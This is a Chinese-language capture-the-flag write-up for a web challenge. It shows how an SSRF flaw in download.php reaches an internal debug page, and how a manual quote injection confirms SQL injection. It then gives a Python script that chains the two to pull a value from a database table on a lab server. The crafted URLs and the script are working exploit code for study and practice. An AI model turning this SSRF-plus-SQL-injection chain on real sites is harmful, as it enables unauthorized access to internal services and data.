考的是sql注入,结合之前的ics系列,肯定要从唯一有用的a链接入手,发现文档中心可以进入,点进去,又发现一个a链接
<a href="download.php?dl=ssrf">paper. </a>
下下来download.php,打开可以发现pdf之类的头,那么就是个pdf,结合ssrf的提示,后面可能会有用 然后扫一波目录,发现/secrets目录 发现里面有secret_debug.php和secret.php两个文件,其中debug文件不能直接访问,那么ssrf大概就在这了,简单来说,就是你能访问有外部端口作为代理 来访问内网本来你访问不到的资源 先看一下做好的secret.php,进行注册,逻辑应该是insert 既然有debug页面,那么正常页面应该是不会有错的,分析一下大佬的脚本。。。 用download.php里面的ssrf漏洞去执行debug.php,尝试sql注入 s=3是待注入的目标页面 先自己手工注一下看下原理吧
http://111.200.241.244:50054/download.php?dl=http://127.0.0.1/secret/secret_debug.php?s=3%26txtfirst_name=1234'%26txtmiddle_name=1234%26txtname_suffix=asdf%26txtLast_name=asdf%26txtdob=12%26txtdl_nmbr=3%26txtRetypeDL=3%26a=3
这里从回显可以很明显的看出来存在sql注入,我在1234后面加了一个’于是在那里报错 注意%26 url解码是&;这是由前端浏览器自动做的,由于后端apache会再做一次编码转换,最后被转换为& 当然也可以直接写脚本一次编码,或者在burpsuite里面手动改包,看个人喜好 直接给一个大佬的脚本吧
import requests
import random
import urllib
url = 'http://111.200.241.244:50054/download.php'
subquery = "select value from cetcYssrf LIMIT 1"
id = random.randint(1, 10000000)
d = ('http://127.0.0.1/secret/secret_debug.php?' +
urllib.parse.urlencode({
"s": "3",
"txtfirst_name": "L','1',("+subquery+"),'1'/*",
"txtmiddle_name": "m",
"txtLast_name": "y",
"txtname_suffix": "Esq.",
"txtdob": "*/,'01/10/2021",
"txtdl_nmbr": id,
"txtRetypeDL": id,
"btnContinue2":"Continue"
})
)
r = requests.get(url, params={"dl": d})
print(d)
print(r)
print(r.text)
参考视频链接:https://www.bilibili.com/video/BV1Rq4y1P7V5/
|